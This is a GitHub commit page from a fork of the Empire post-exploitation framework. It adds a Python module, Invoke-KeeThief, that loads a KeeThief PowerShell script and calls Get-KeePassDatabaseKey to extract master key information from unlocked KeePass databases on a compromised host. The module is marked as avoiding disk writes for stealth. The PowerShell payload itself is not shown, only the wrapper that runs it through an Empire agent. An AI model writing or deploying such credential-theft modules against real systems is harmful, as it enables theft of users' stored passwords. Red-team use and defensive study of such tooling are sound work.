forked from EmpireProject/Empire
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
275 additions
and
0 deletions.
There are no files selected for viewing
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,90 @@ | ||
| from lib.common import helpers | ||
|
|
||
| class Module: | ||
|
|
||
| def __init__(self, mainMenu, params=[]): | ||
|
|
||
| # metadata info about the module, not modified during runtime | ||
| self.info = { | ||
| # name for the module that will appear in module menus | ||
| 'Name': 'Invoke-KeeThief', | ||
|
|
||
| # list of one or more authors for the module | ||
| 'Author': ['@tifkin_', '@harmj0y'], | ||
|
|
||
| # more verbose multi-line description of the module | ||
| 'Description': ('This module retrieves database mastey key information for unlocked KeePass database.'), | ||
|
|
||
| # True if the module needs to run in the background | ||
| 'Background' : True, | ||
|
|
||
| # File extension to save the file as | ||
| 'OutputExtension' : '', | ||
|
|
||
| # True if the module needs admin rights to run | ||
| 'NeedsAdmin' : False, | ||
|
|
||
| # True if the method doesn't touch disk/is reasonably opsec safe | ||
| 'OpsecSafe' : True, | ||
|
|
||
| # The minimum PowerShell version needed for the module to run | ||
| 'MinPSVersion' : '2', | ||
|
|
||
| # list of any references/other comments | ||
| 'Comments': [ | ||
| 'https://github.com/adaptivethreat/KeeThief' | ||
| ] | ||
| } | ||
|
|
||
| # any options needed by the module, settable during runtime | ||
| self.options = { | ||
| # format: | ||
| # value_name : {description, required, default_value} | ||
| 'Agent' : { | ||
| # The 'Agent' option is the only one that MUST be in a module | ||
| 'Description' : 'Agent to run the module on.', | ||
| 'Required' : True, | ||
| 'Value' : '' | ||
| } | ||
| } | ||
|
|
||
| # save off a copy of the mainMenu object to access external functionality | ||
| # like listeners/agent handlers/etc. | ||
| self.mainMenu = mainMenu | ||
|
|
||
| # During instantiation, any settable option parameters | ||
| # are passed as an object set to the module and the | ||
| # options dictionary is automatically set. This is mostly | ||
| # in case options are passed on the command line | ||
| if params: | ||
| for param in params: | ||
| # parameter format is [Name, Value] | ||
| option, value = param | ||
| if option in self.options: | ||
| self.options[option]['Value'] = value | ||
|
|
||
|
|
||
| def generate(self): | ||
|
|
||
| moduleName = self.info["Name"] | ||
|
|
||
| # read in the common powerview.ps1 module source code | ||
| moduleSource = self.mainMenu.installPath + "/data/module_source/collection/KeeThief.ps1" | ||
|
|
||
| try: | ||
| f = open(moduleSource, 'r') | ||
| except: | ||
| print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) | ||
| return "" | ||
|
|
||
| moduleCode = f.read() | ||
| f.close() | ||
|
|
||
| # get just the code needed for the specified function | ||
| script = moduleCode | ||
|
|
||
| script += "\nGet-KeePassDatabaseKey " | ||
|
|
||
| script += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' | ||
|
|
||
| return script |